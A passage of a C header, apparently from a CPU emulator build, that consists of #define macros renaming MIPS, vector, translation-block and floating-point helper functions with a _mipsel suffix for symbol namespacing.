helper_gvec_le64_mipsel #define helper_gvec_ltu64 helper_gvec_ltu64_mipsel #define helper_gvec_leu64 helper_gvec_leu64_mipsel #define helper_gvec_ssadd8 helper_gvec_ssadd8_mipsel #define helper_gvec_ssadd16 helper_gvec_ssadd16_mipsel #define helper_gvec_ssadd32 helper_gvec_ssadd32_mipsel #define helper_gvec_ssadd64 helper_gvec_ssadd64_mipsel #define helper_gvec_sssub8 helper_gvec_sssub8_mipsel #define helper_gvec_sssub16 helper_gvec_sssub16_mipsel #define helper_gvec_sssub32 helper_gvec_sssub32_mipsel #define helper_gvec_sssub64 helper_gvec_sssub64_mipsel #define helper_gvec_usadd8 helper_gvec_usadd8_mipsel #define helper_gvec_usadd16 helper_gvec_usadd16_mipsel #define helper_gvec_usadd32 helper_gvec_usadd32_mipsel #define helper_gvec_usadd64 helper_gvec_usadd64_mipsel #define helper_gvec_ussub8 helper_gvec_ussub8_mipsel #define helper_gvec_ussub16 helper_gvec_ussub16_mipsel #define helper_gvec_ussub32 helper_gvec_ussub32_mipsel #define helper_gvec_ussub64 helper_gvec_ussub64_mipsel #define helper_gvec_smin8 helper_gvec_smin8_mipsel #define helper_gvec_smin16 helper_gvec_smin16_mipsel #define helper_gvec_smin32 helper_gvec_smin32_mipsel #define helper_gvec_smin64 helper_gvec_smin64_mipsel #define helper_gvec_smax8 helper_gvec_smax8_mipsel #define helper_gvec_smax16 helper_gvec_smax16_mipsel #define helper_gvec_smax32 helper_gvec_smax32_mipsel #define helper_gvec_smax64 helper_gvec_smax64_mipsel #define helper_gvec_umin8 helper_gvec_umin8_mipsel #define helper_gvec_umin16 helper_gvec_umin16_mipsel #define helper_gvec_umin32 helper_gvec_umin32_mipsel #define helper_gvec_umin64 helper_gvec_umin64_mipsel #define helper_gvec_umax8 helper_gvec_umax8_mipsel #define helper_gvec_umax16 helper_gvec_umax16_mipsel #define helper_gvec_umax32 helper_gvec_umax32_mipsel #define helper_gvec_umax64 helper_gvec_umax64_mipsel #define helper_gvec_bitsel helper_gvec_bitsel_mipsel #define cpu_restore_state cpu_restore_state_mipsel #define page_collection_lock page_collection_lock_mipsel #define page_collection_unlock page_collection_unlock_mipsel #define free_code_gen_buffer free_code_gen_buffer_mipsel #define tcg_exec_init tcg_exec_init_mipsel #define tb_cleanup tb_cleanup_mipsel #define tb_flush tb_flush_mipsel #define tb_phys_invalidate tb_phys_invalidate_mipsel #define tb_gen_code tb_gen_code_mipsel #define tb_exec_lock tb_exec_lock_mipsel #define tb_exec_unlock tb_exec_unlock_mipsel #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_mipsel #define tb_invalidate_phys_range tb_invalidate_phys_range_mipsel #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_mipsel #define tb_check_watchpoint tb_check_watchpoint_mipsel #define cpu_io_recompile cpu_io_recompile_mipsel #define tb_flush_jmp_cache tb_flush_jmp_cache_mipsel #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_mipsel #define translator_loop_temp_check translator_loop_temp_check_mipsel #define translator_loop translator_loop_mipsel #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_mipsel #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_mipsel #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_mipsel #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_mipsel #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_mipsel #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_mipsel #define unassigned_mem_ops unassigned_mem_ops_mipsel #define floatx80_infinity floatx80_infinity_mipsel #define dup_const_func dup_const_func_mipsel #define gen_helper_raise_exception gen_helper_raise_exception_mipsel #define gen_helper_raise_interrupt gen_helper_raise_interrupt_mipsel #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_mipsel #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_mipsel #define gen_helper_cpsr_read gen_helper_cpsr_read_mipsel #define gen_helper_cpsr_write gen_helper_cpsr_write_mipsel #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_mipsel #define helper_mfc0_mvpcontrol helper_mfc0_mvpcontrol_mipsel #define helper_mfc0_mvpconf0 helper_mfc0_mvpconf0_mipsel #define helper_mfc0_mvpconf1 helper_mfc0_mvpconf1_mipsel #define helper_mfc0_random helper_mfc0_random_mipsel #define helper_mfc0_tcstatus helper_mfc0_tcstatus_mipsel #define helper_mftc0_tcstatus helper_mftc0_tcstatus_mipsel #define helper_mfc0_tcbind helper_mfc0_tcbind_mipsel #define helper_mftc0_tcbind helper_mftc0_tcbind_mipsel #define helper_mfc0_tcrestart helper_mfc0_tcrestart_mipsel #define helper_mftc0_tcrestart helper_mftc0_tcrestart_mipsel #define helper_mfc0_tchalt helper_mfc0_tchalt_mipsel #define helper_mftc0_tchalt helper_mftc0_tchalt_mipsel #define helper_mfc0_tccontext helper_mfc0_tccontext_mipsel #define helper_mftc0_tccontext helper_mftc0_tccontext_mipsel #define helper_mfc0_tcschedule helper_mfc0_tcschedule_mipsel #define helper_mftc0_tcschedule helper_mftc0_tcschedule_mipsel #define helper_mfc0_tcschefback helper_mfc0_tcschefback_mipsel #define helper_mftc0_tcschefback helper_mftc0_tcschefback_mipsel #define helper_mfc0_count helper_mfc0_count_mipsel #define helper_mfc0_saar helper_mfc0_saar_mipsel #define helper_mfhc0_saar helper_mfhc0_saar_mipsel #define helper_mftc0_entryhi helper_mftc0_entryhi_mipsel #define helper_mftc0_cause helper_mftc0_cause_mipsel #define helper_mftc0_status helper_mftc0_status_mipsel #define helper_mfc0_lladdr helper_mfc0_lladdr_mipsel #define helper_mfc0_maar helper_mfc0_maar_mipsel #define helper_mfhc0_maar helper_mfhc0_maar_mipsel #define helper_mfc0_watchlo helper_mfc0_watchlo_mipsel #define helper_mfc0_watchhi helper_mfc0_watchhi_mipsel #define helper_mfhc0_watchhi helper_mfhc0_watchhi_mipsel #define helper_mfc0_debug helper_mfc0_debug_mipsel #define helper_mftc0_debug helper_mftc0_debug_mipsel #define helper_dmfc0_tcrestart helper_dmfc0_tcrestart_mipsel #define helper_dmfc0_tchalt helper_dmfc0_tchalt_mipsel #define helper_dmfc0_tccontext helper_dmfc0_tccontext_mipsel #define helper_dmfc0_tcschedule helper_dmfc0_tcschedule_mipsel #define helper_dmfc0_tcschefback helper_dmfc0_tcschefback_mipsel #define helper_dmfc0_lladdr helper_dmfc0_lladdr_mipsel #define helper_dmfc0_maar helper_dmfc0_maar_mipsel #define helper_dmfc0_watchlo helper_dmfc0_watchlo_mipsel #define helper_dmfc0_watchhi helper_dmfc0_watchhi_mipsel #define helper_dmfc0_saar helper_dmfc0_saar_mipsel #define helper_mtc0_index helper_mtc0_index_mipsel #define helper_mtc0_mvpcontrol helper_mtc0_mvpcontrol_mipsel #define helper_mtc0_vpecontrol helper_mtc0_vpecontrol_mipsel #define helper_mttc0_vpecontrol helper_mttc0_vpecontrol_mipsel #define helper_mftc0_vpecontrol helper_mftc0_vpecontrol_mipsel #define helper_mftc0_vpeconf0 helper_mftc0_vpeconf0_mipsel #define helper_mtc0_vpeconf0 helper_mtc0_vpeconf0_mipsel #define helper_mttc0_vpeconf0 helper_mttc0_vpeconf0_mipsel #define helper_mtc0_vpeconf1 helper_mtc0_vpeconf1_mipsel #define helper_mtc0_yqmask helper_mtc0_yqmask_mipsel #define helper_mtc0_vpeopt helper_mtc0_vpeopt_mipsel #define helper_mtc0_entrylo0 helper_mtc0_entrylo0_mipsel #define helper_dmtc0_entrylo0 helper_dmtc0_entrylo0_mipsel #define helper_mtc0_tcstatus helper_mtc0_tcstatus_mipsel #define helper_mttc0_tcstatus helper_mttc0_tcstatus_mipsel #define helper_mtc0_tcbind helper_mtc0_tcbind_mipsel #define helper_mttc0_tcbind helper_mttc0_tcbind_mipsel #define helper_mtc0_tcrestart helper_mtc0_tcrestart_mipsel #define helper_mttc0_tcrestart helper_mttc0_tcrestart_mipsel #define helper_mtc0_tchalt helper_mtc0_tchalt_mipsel #define helper_mttc0_tchalt helper_mttc0_tchalt_mipsel #define helper_mtc0_tccontext helper_mtc0_tccontext_mipsel #define helper_mttc0_tccontext helper_mttc0_tccontext_mipsel #define helper_mtc0_tcschedule helper_mtc0_tcschedule_mipsel #define helper_mttc0_tcschedule helper_mttc0_tcschedule_mipsel #define helper_mtc0_tcschefback helper_mtc0_tcschefback_mipsel #define helper_mttc0_tcschefback helper_mttc0_tcschefback_mipsel #define helper_mtc0_entrylo1 helper_mtc0_entrylo1_mipsel #define helper_dmtc0_entrylo1 helper_dmtc0_entrylo1_mipsel #define helper_mtc0_context helper_mtc0_context_mipsel #define helper_mtc0_memorymapid helper_mtc0_memorymapid_mipsel #define update_pagemask update_pagemask_mipsel #define helper_mtc0_pagemask helper_mtc0_pagemask_mipsel #define helper_mtc0_pagegrain helper_mtc0_pagegrain_mipsel #define helper_mtc0_segctl0 helper_mtc0_segctl0_mipsel #define helper_mtc0_segctl1 helper_mtc0_segctl1_mipsel #define helper_mtc0_segctl2 helper_mtc0_segctl2_mipsel #define helper_mtc0_pwfield helper_mtc0_pwfield_mipsel #define helper_mtc0_pwsize helper_mtc0_pwsize_mipsel #define helper_mtc0_wired helper_mtc0_wired_mipsel #define helper_mtc0_pwctl helper_mtc0_pwctl_mipsel #define helper_mtc0_srsconf0 helper_mtc0_srsconf0_mipsel #define helper_mtc0_srsconf1 helper_mtc0_srsconf1_mipsel #define helper_mtc0_srsconf2 helper_mtc0_srsconf2_mipsel #define helper_mtc0_srsconf3 helper_mtc0_srsconf3_mipsel #define helper_mtc0_srsconf4 helper_mtc0_srsconf4_mipsel #define helper_mtc0_hwrena helper_mtc0_hwrena_mipsel #define helper_mtc0_count helper_mtc0_count_mipsel #define helper_mtc0_saari helper_mtc0_saari_mipsel #define helper_mtc0_saar helper_mtc0_saar_mipsel #define helper_mthc0_saar helper_mthc0_saar_mipsel #define helper_mtc0_entryhi helper_mtc0_entryhi_mipsel #define helper_mttc0_entryhi helper_mttc0_entryhi_mipsel #define helper_mtc0_compare helper_mtc0_compare_mipsel #define helper_mtc0_status helper_mtc0_status_mipsel #define helper_mttc0_status helper_mttc0_status_mipsel #define helper_mtc0_intctl helper_mtc0_intctl_mipsel #define helper_mtc0_srsctl helper_mtc0_srsctl_mipsel #define helper_mtc0_cause helper_mtc0_cause_mipsel #define helper_mttc0_cause helper_mttc0_cause_mipsel #define helper_mftc0_epc helper_mftc0_epc_mipsel #define helper_mftc0_ebase helper_mftc0_ebase_mipsel #define helper_mtc0_ebase helper_mtc0_ebase_mipsel #define helper_mttc0_ebase helper_mttc0_ebase_mipsel #define helper_mftc0_configx helper_mftc0_configx_mipsel #define helper_mtc0_config0 helper_mtc0_config0_mipsel #define helper_mtc0_config2 helper_mtc0_config2_mipsel #define helper_mtc0_config3 helper_mtc0_config3_mipsel #define helper_mtc0_config4 helper_mtc0_config4_mipsel #define helper_mtc0_config5 helper_mtc0_config5_mipsel #define helper_mtc0_lladdr helper_mtc0_lladdr_mipsel #define helper_mtc0_maar helper_mtc0_maar_mipsel #define helper_mthc0_maar helper_mthc0_maar_mipsel #define helper_mtc0_maari helper_mtc0_maari_mipsel #define helper_mtc0_watchlo helper_mtc0_watchlo_mipsel #define helper_mtc0_watchhi helper_mtc0_watchhi_mipsel #define helper_mthc0_watchhi helper_mthc0_watchhi_mipsel #define helper_mtc0_xcontext helper_mtc0_xcontext_mipsel #define helper_mtc0_framemask helper_mtc0_framemask_mipsel #define helper_mtc0_debug helper_mtc0_debug_mipsel #define helper_mttc0_debug helper_mttc0_debug_mipsel #define helper_mtc0_performance0 helper_mtc0_performance0_mipsel #define helper_mtc0_errctl helper_mtc0_errctl_mipsel #define helper_mtc0_taglo helper_mtc0_taglo_mipsel #define helper_mtc0_datalo helper_mtc0_datalo_mipsel #define helper_mtc0_taghi helper_mtc0_taghi_mipsel #define helper_mtc0_datahi helper_mtc0_datahi_mipsel #define helper_mftgpr helper_mftgpr_mipsel #define helper_mftlo helper_mftlo_mipsel #define helper_mfthi helper_mfthi_mipsel #define helper_mftacx helper_mftacx_mipsel #define helper_mftdsp helper_mftdsp_mipsel #define helper_mttgpr helper_mttgpr_mipsel #define helper_mttlo helper_mttlo_mipsel #define helper_mtthi helper_mtthi_mipsel #define helper_mttacx helper_mttacx_mipsel #define helper_mttdsp helper_mttdsp_mipsel #define helper_dmt helper_dmt_mipsel #define helper_emt helper_emt_mipsel #define helper_dvpe helper_dvpe_mipsel #define helper_evpe helper_evpe_mipsel #define helper_dvp helper_dvp_mipsel #define helper_evp helper_evp_mipsel #define cpu_mips_get_random cpu_mips_get_random_mipsel #define cpu_mips_init cpu_mips_init_mipsel #define helper_absq_s_ph helper_absq_s_ph_mipsel #define helper_absq_s_qb helper_absq_s_qb_mipsel #define helper_absq_s_w helper_absq_s_w_mipsel #define helper_absq_s_ob helper_absq_s_ob_mipsel #define helper_absq_s_qh helper_absq_s_qh_mipsel #define helper_absq_s_pw helper_absq_s_pw_mipsel #define helper_addqh_ph helper_addqh_ph_mipsel #define helper_addqh_r_ph helper_addqh_r_ph_mipsel #define helper_addqh_r_w helper_addqh_r_w_mipsel #define helper_addqh_w helper_addqh_w_mipsel #define helper_adduh_qb helper_adduh_qb_mipsel #define helper_adduh_r_qb helper_adduh_r_qb_mipsel #define helper_subqh_ph helper_subqh_ph_mipsel #define helper_subqh_r_ph helper_subqh_r_ph_mipsel #define helper_subqh_r_w helper_subqh_r_w_mipsel #define helper_subqh_w helper_subqh_w_mipsel #define helper_addq_ph helper_addq_ph_mipsel #define helper_addq_s_ph helper_addq_s_ph_mipsel #define helper_addq_s_w helper_addq_s_w_mipsel #define helper_addu_ph helper_addu_ph_mipsel #define helper_addu_qb helper_addu_qb_mipsel #define helper_addu_s_ph helper_addu_s_ph_mipsel #define helper_addu_s_qb helper_addu_s_qb_mipsel #define helper_subq_ph helper_subq_ph_mipsel #define helper_subq_s_ph helper_subq_s_ph_mipsel #define helper_subq_s_w helper_subq_s_w_mipsel #define helper_subu_ph helper_subu_ph_mipsel #define helper_subu_qb helper_subu_qb_mipsel #define helper_subu_s_ph helper_subu_s_ph_mipsel #define helper_subu_s_qb helper_subu_s_qb_mipsel #define helper_adduh_ob helper_adduh_ob_mipsel #define helper_adduh_r_ob helper_adduh_r_ob_mipsel #define helper_subuh_ob helper_subuh_ob_mipsel #define helper_subuh_r_ob helper_subuh_r_ob_mipsel #define helper_addq_pw helper_addq_pw_mipsel #define helper_addq_qh helper_addq_qh_mipsel #define helper_addq_s_pw helper_addq_s_pw_mipsel #define helper_addq_s_qh helper_addq_s_qh_mipsel #define helper_addu_ob helper_addu_ob_mipsel #define helper_addu_qh helper_addu_qh_mipsel #define helper_addu_s_ob helper_addu_s_ob_mipsel #define helper_addu_s_qh helper_addu_s_qh_mipsel #define helper_subq_pw helper_subq_pw_mipsel #define helper_subq_qh helper_subq_qh_mipsel #define helper_subq_s_pw helper_subq_s_pw_mipsel #define helper_subq_s_qh helper_subq_s_qh_mipsel #define helper_subu_ob helper_subu_ob_mipsel #define helper_subu_qh helper_subu_qh_mipsel #define helper_subu_s_ob helper_subu_s_ob_mipsel #define helper_subu_s_qh helper_subu_s_qh_mipsel #define helper_subuh_qb helper_subuh_qb_mipsel #define helper_subuh_r_qb helper_subuh_r_qb_mipsel #define helper_addsc helper_addsc_mipsel #define helper_addwc helper_addwc_mipsel #define helper_modsub helper_modsub_mipsel #define helper_raddu_w_qb helper_raddu_w_qb_mipsel #define helper_raddu_l_ob helper_raddu_l_ob_mipsel #define helper_precr_qb_ph helper_precr_qb_ph_mipsel #define helper_precrq_qb_ph helper_precrq_qb_ph_mipsel #define helper_precr_sra_ph_w helper_precr_sra_ph_w_mipsel #define helper_precr_sra_r_ph_w helper_precr_sra_r_ph_w_mipsel #define helper_precrq_ph_w helper_precrq_ph_w_mipsel #define helper_precrq_rs_ph_w helper_precrq_rs_ph_w_mipsel #define helper_precr_ob_qh helper_precr_ob_qh_mipsel #define helper_precr_sra_qh_pw helper_precr_sra_qh_pw_mipsel #define helper_precr_sra_r_qh_pw helper_precr_sra_r_qh_pw_mipsel #define helper_precrq_ob_qh helper_precrq_ob_qh_mipsel #define helper_precrq_qh_pw helper_precrq_qh_pw_mipsel #define helper_precrq_rs_qh_pw helper_precrq_rs_qh_pw_mipsel #define helper_precrq_pw_l helper_precrq_pw_l_mipsel #define helper_precrqu_s_qb_ph helper_precrqu_s_qb_ph_mipsel #define helper_precrqu_s_ob_qh helper_precrqu_s_ob_qh_mipsel #define helper_preceq_pw_qhl helper_preceq_pw_qhl_mipsel #define helper_preceq_pw_qhr helper_preceq_pw_qhr_mipsel #define helper_preceq_pw_qhla helper_preceq_pw_qhla_mipsel #define helper_preceq_pw_qhra helper_preceq_pw_qhra_mipsel #define helper_precequ_ph_qbl helper_precequ_ph_qbl_mipsel #define helper_precequ_ph_qbr helper_precequ_ph_qbr_mipsel #define helper_precequ_ph_qbla helper_precequ_ph_qbla_mipsel #define helper_precequ_ph_qbra helper_precequ_ph_qbra_mipsel #define helper_precequ_qh_obl helper_precequ_qh_obl_mipsel #define helper_precequ_qh_obr helper_precequ_qh_obr_mipsel #define helper_precequ_qh_obla helper_precequ_qh_obla_mipsel #define helper_precequ_qh_obra helper_precequ_qh_obra_mipsel #define helper_preceu_ph_qbl helper_preceu_ph_qbl_mipsel #define helper_preceu_ph_qbr helper_preceu_ph_qbr_mipsel #define helper_preceu_ph_qbla helper_preceu_ph_qbla_mipsel #define helper_preceu_ph_qbra helper_preceu_ph_qbra_mipsel #define helper_preceu_qh_obl helper_preceu_qh_obl_mipsel #define helper_preceu_qh_obr helper_preceu_qh_obr_mipsel #define helper_preceu_qh_obla helper_preceu_qh_obla_mipsel #define helper_preceu_qh_obra helper_preceu_qh_obra_mipsel #define helper_shll_qb helper_shll_qb_mipsel #define helper_shrl_qb helper_shrl_qb_mipsel #define helper_shra_qb helper_shra_qb_mipsel #define helper_shra_r_qb helper_shra_r_qb_mipsel #define helper_shll_ob helper_shll_ob_mipsel #define helper_shrl_ob helper_shrl_ob_mipsel #define helper_shra_ob helper_shra_ob_mipsel #define helper_shra_r_ob helper_shra_r_ob_mipsel #define helper_shll_ph helper_shll_ph_mipsel #define helper_shll_s_ph helper_shll_s_ph_mipsel #define helper_shll_qh helper_shll_qh_mipsel #define helper_shll_s_qh helper_shll_s_qh_mipsel #define helper_shrl_qh helper_shrl_qh_mipsel #define helper_shra_qh helper_shra_qh_mipsel #define helper_shra_r_qh helper_shra_r_qh_mipsel #define helper_shll_s_w helper_shll_s_w_mipsel #define helper_shra_r_w helper_shra_r_w_mipsel #define helper_shll_pw helper_shll_pw_mipsel #define helper_shll_s_pw helper_shll_s_pw_mipsel #define helper_shra_pw helper_shra_pw_mipsel #define helper_shra_r_pw helper_shra_r_pw_mipsel #define helper_shrl_ph helper_shrl_ph_mipsel #define helper_shra_ph helper_shra_ph_mipsel #define helper_shra_r_ph helper_shra_r_ph_mipsel #define helper_muleu_s_ph_qbl helper_muleu_s_ph_qbl_mipsel #define helper_muleu_s_ph_qbr helper_muleu_s_ph_qbr_mipsel #define helper_mulq_rs_ph helper_mulq_rs_ph_mipsel #define helper_mul_ph helper_mul_ph_mipsel #define helper_mul_s_ph helper_mul_s_ph_mipsel #define helper_mulq_s_ph helper_mulq_s_ph_mipsel #define helper_muleq_s_w_phl helper_muleq_s_w_phl_mipsel #define helper_muleq_s_w_phr helper_muleq_s_w_phr_mipsel #define helper_mulsaq_s_w_ph helper_mulsaq_s_w_ph_mipsel #define helper_mulsa_w_ph helper_mulsa_w_ph_mipsel #define helper_muleu_s_qh_obl helper_muleu_s_qh_obl_mipsel #define helper_muleu_s_qh_obr helper_muleu_s_qh_obr_mipsel #define helper_mulq_rs_qh helper_mulq_rs_qh_mipsel #define helper_muleq_s_pw_qhl helper_muleq_s_pw_qhl_mipsel #define helper_muleq_s_pw_qhr helper_muleq_s_pw_qhr_mipsel #define helper_mulsaq_s_w_qh helper_mulsaq_s_w_qh_mipsel #define helper_dpau_h_qbl helper_dpau_h_qbl_mipsel #define helper_dpau_h_qbr helper_dpau_h_qbr_mipsel #define helper_dpsu_h_qbl helper_dpsu_h_qbl_mipsel #define helper_dpsu_h_qbr helper_dpsu_h_qbr_mipsel #define helper_dpau_h_obl helper_dpau_h_obl_mipsel #define helper_dpau_h_obr helper_dpau_h_obr_mipsel #define helper_dpsu_h_obl helper_dpsu_h_obl_mipsel #define helper_dpsu_h_obr helper_dpsu_h_obr_mipsel #define helper_dpa_w_ph helper_dpa_w_ph_mipsel #define helper_dpax_w_ph helper_dpax_w_ph_mipsel #define helper_dps_w_ph helper_dps_w_ph_mipsel #define helper_dpsx_w_ph helper_dpsx_w_ph_mipsel #define helper_dpaq_s_w_ph helper_dpaq_s_w_ph_mipsel #define helper_dpaqx_s_w_ph helper_dpaqx_s_w_ph_mipsel #define helper_dpsq_s_w_ph helper_dpsq_s_w_ph_mipsel #define helper_dpsqx_s_w_ph helper_dpsqx_s_w_ph_mipsel #define helper_dpaqx_sa_w_ph helper_dpaqx_sa_w_ph_mipsel #define helper_dpsqx_sa_w_ph helper_dpsqx_sa_w_ph_mipsel #define helper_dpa_w_qh helper_dpa_w_qh_mipsel #define helper_dpaq_s_w_qh helper_dpaq_s_w_qh_mipsel #define helper_dps_w_qh helper_dps_w_qh_mipsel #define helper_dpsq_s_w_qh helper_dpsq_s_w_qh_mipsel #define helper_dpaq_sa_l_w helper_dpaq_sa_l_w_mipsel #define helper_dpsq_sa_l_w helper_dpsq_sa_l_w_mipsel #define helper_dpaq_sa_l_pw helper_dpaq_sa_l_pw_mipsel #define helper_dpsq_sa_l_pw helper_dpsq_sa_l_pw_mipsel #define helper_mulsaq_s_l_pw helper_mulsaq_s_l_pw_mipsel #define helper_maq_s_w_phl helper_maq_s_w_phl_mipsel #define helper_maq_s_w_phr helper_maq_s_w_phr_mipsel #define helper_maq_sa_w_phl helper_maq_sa_w_phl_mipsel #define helper_maq_sa_w_phr helper_maq_sa_w_phr_mipsel #define helper_mulq_s_w helper_mulq_s_w_mipsel #define helper_mulq_rs_w helper_mulq_rs_w_mipsel #define helper_maq_s_w_qhll helper_maq_s_w_qhll_mipsel #define helper_maq_s_w_qhlr helper_maq_s_w_qhlr_mipsel #define helper_maq_s_w_qhrl helper_maq_s_w_qhrl_mipsel #define helper_maq_s_w_qhrr helper_maq_s_w_qhrr_mipsel #define helper_maq_sa_w_qhll helper_maq_sa_w_qhll_mipsel #define helper_maq_sa_w_qhlr helper_maq_sa_w_qhlr_mipsel #define helper_maq_sa_w_qhrl helper_maq_sa_w_qhrl_mipsel #define helper_maq_sa_w_qhrr helper_maq_sa_w_qhrr_mipsel #define helper_maq_s_l_pwl helper_maq_s_l_pwl_mipsel #define helper_maq_s_l_pwr helper_maq_s_l_pwr_mipsel #define helper_dmadd helper_dmadd_mipsel #define helper_dmaddu helper_dmaddu_mipsel #define helper_dmsub helper_dmsub_mipsel #define helper_dmsubu helper_dmsubu_mipsel #define helper_bitrev helper_bitrev_mipsel #define helper_insv helper_insv_mipsel #define helper_dinsv helper_dinsv_mipsel #define helper_cmpgu_eq_qb helper_cmpgu_eq_qb_mipsel #define helper_cmpgu_lt_qb helper_cmpgu_lt_qb_mipsel #define helper_cmpgu_le_qb helper_cmpgu_le_qb_mipsel #define helper_cmpgu_eq_ob helper_cmpgu_eq_ob_mipsel #define helper_cmpgu_lt_ob helper_cmpgu_lt_ob_mipsel #define helper_cmpgu_le_ob helper_cmpgu_le_ob_mipsel #define helper_cmpu_eq_qb helper_cmpu_eq_qb_mipsel #define helper_cmpu_lt_qb helper_cmpu_lt_qb_mipsel #define helper_cmpu_le_qb helper_cmpu_le_qb_mipsel #define helper_cmp_eq_ph helper_cmp_eq_ph_mipsel #define helper_cmp_lt_ph helper_cmp_lt_ph_mipsel #define helper_cmp_le_ph helper_cmp_le_ph_mipsel #define helper_cmpu_eq_ob helper_cmpu_eq_ob_mipsel #define helper_cmpu_lt_ob helper_cmpu_lt_ob_mipsel #define helper_cmpu_le_ob helper_cmpu_le_ob_mipsel #define helper_cmp_eq_qh helper_cmp_eq_qh_mipsel #define helper_cmp_lt_qh helper_cmp_lt_qh_mipsel #define helper_cmp_le_qh helper_cmp_le_qh_mipsel #define helper_cmp_eq_pw helper_cmp_eq_pw_mipsel #define helper_cmp_lt_pw helper_cmp_lt_pw_mipsel #define helper_cmp_le_pw helper_cmp_le_pw_mipsel #define helper_cmpgdu_eq_ob helper_cmpgdu_eq_ob_mipsel #define helper_cmpgdu_lt_ob helper_cmpgdu_lt_ob_mipsel #define helper_cmpgdu_le_ob helper_cmpgdu_le_ob_mipsel #define helper_pick_qb helper_pick_qb_mipsel #define helper_pick_ph helper_pick_ph_mipsel #define helper_pick_ob helper_pick_ob_mipsel #define helper_pick_qh helper_pick_qh_mipsel #define helper_pick_pw helper_pick_pw_mipsel #define helper_packrl_ph helper_packrl_ph_mipsel #define helper_packrl_pw helper_packrl_pw_mipsel #define helper_extr_w helper_extr_w_mipsel #define helper_extr_r_w helper_extr_r_w_mipsel #define helper_extr_rs_w helper_extr_rs_w_mipsel #define helper_dextr_w helper_dextr_w_mipsel #define helper_dextr_r_w helper_dextr_r_w_mipsel #define helper_dextr_rs_w helper_dextr_rs_w_mipsel #define helper_dextr_l helper_dextr_l_mipsel #define helper_dextr_r_l helper_dextr_r_l_mipsel #define helper_dextr_rs_l helper_dextr_rs_l_mipsel #define helper_extr_s_h helper_extr_s_h_mipsel #define helper_dextr_s_h helper_dextr_s_h_mipsel #define helper_extp helper_extp_mipsel #define helper_extpdp helper_extpdp_mipsel #define helper_dextp helper_dextp_mipsel #define helper_dextpdp helper_dextpdp_mipsel #define helper_shilo helper_shilo_mipsel #define helper_dshilo helper_dshilo_mipsel #define helper_mthlip helper_mthlip_mipsel #define helper_dmthlip helper_dmthlip_mipsel #define cpu_wrdsp cpu_wrdsp_mipsel #define helper_wrdsp helper_wrdsp_mipsel #define cpu_rddsp cpu_rddsp_mipsel #define helper_rddsp helper_rddsp_mipsel #define helper_cfc1 helper_cfc1_mipsel #define helper_ctc1 helper_ctc1_mipsel #define ieee_ex_to_mips ieee_ex_to_mips_mipsel #define helper_float_sqrt_d helper_float_sqrt_d_mipsel #define helper_float_sqrt_s helper_float_sqrt_s_mipsel #define helper_float_cvtd_s helper_float_cvtd_s_mipsel #define helper_float_cvtd_w helper_float_cvtd_w_mipsel #define helper_float_cvtd_l helper_float_cvtd_l_mipsel #define helper_float_cvt_l_d helper_float_cvt_l_d_mipsel #define helper_float_cvt_l_s helper_float_cvt_l_s_mipsel #define helper_float_cvtps_pw helper_float_cvtps_pw_mipsel #define helper_float_cvtpw_ps helper_float_cvtpw_ps_mipsel #define helper_float_cvts_d helper_float_cvts_d_mipsel #define helper_float_cvts_w helper_float_cvts_w_mipsel #define helper_float_cvts_l helper_float_cvts_l_mipsel #define helper_float_cvts_pl helper_float_cvts_pl_mipsel #define helper_float_cvts_pu helper_float_cvts_pu_mipsel #define helper_float_cvt_w_s helper_float_cvt_w_s_mipsel #define helper_float_cvt_w_d helper_float_cvt_w_d_mipsel #define helper_float_round_l_d helper_float_round_l_d_mipsel #define helper_float_round_l_s helper_float_round_l_s_mipsel #define helper_float_round_w_d helper_float_round_w_d_mipsel #define helper_float_round_w_s helper_float_round_w_s_mipsel #define helper_float_trunc_l_d helper_float_trunc_l_d_mipsel #define helper_float_trunc_l_s helper_float_trunc_l_s_mipsel #define helper_float_trunc_w_d helper_float_trunc_w_d_mipsel #define helper_float_trunc_w_s helper_float_trunc_w_s_mipsel #define helper_float_ceil_l_d helper_float_ceil_l_d_mipsel #define helper_float_ceil_l_s helper_float_ceil_l_s_mipsel #define helper_float_ceil_w_d helper_float_ceil_w_d_mipsel #define helper_float_ceil_w_s helper_float_ceil_w_s_mipsel #define helper_float_floor_l_d helper_float_floor_l_d_mipsel #define helper_float_floor_l_s helper_float_floor_l_s_mipsel #define helper_float_floor_w_d helper_float_floor_w_d_mipsel #define helper_float_floor_w_s helper_float_floor_w_s_mipsel #define helper_float_cvt_2008_l_d helper_float_cvt_2008_l_d_mipsel #define helper_float_cvt_2008_l_s helper_float_cvt_2008_l_s_mipsel #define helper_float_cvt_2008_w_d helper_float_cvt_2008_w_d_mipsel #define helper_float_cvt_2008_w_s helper_float_cvt_2008_w_s_mipsel #define helper_float_round_2008_l_d helper_float_round_2008_l_d_mipsel #define helper_float_round_2008_l_s helper_float_round_2008_l_s_mipsel #define helper_float_round_2008_w_d helper_float_round_2008_w_d_mipsel #define helper_float_round_2008_w_s helper_float_round_2008_w_s_mipsel #define helper_float_trunc_2008_l_d helper_float_trunc_2008_l_d_mipsel #define helper_float_trunc_2008_l_s helper_float_trunc_2008_l_s_mipsel #define helper_float_trunc_2008_w_d helper_float_trunc_2008_w_d_mipsel #define helper_float_trunc_2008_w_s helper_float_trunc_2008_w_s_mipsel #define helper_float_ceil_2008_l_d helper_float_ceil_2008_l_d_mipsel #define helper_float_ceil_2008_l_s helper_float_ceil_2008_l_s_mipsel #define helper_float_ceil_2008_w_d helper_float_ceil_2008_w_d_mipsel #define helper_float_ceil_2008_w_s helper_float_ceil_2008_w_s_mipsel #define helper_float_floor_2008_l_d helper_float_floor_2008_l_d_mipsel #define helper_float_floor_2008_l_s helper_float_floor_2008_l_s_mipsel #define helper_float_floor_2008_w_d helper_float_floor_2008_w_d_mipsel #define helper_float_floor_2008_w_s helper_float_floor_2008_w_s_mipsel #define helper_float_abs_d helper_float_abs_d_mipsel 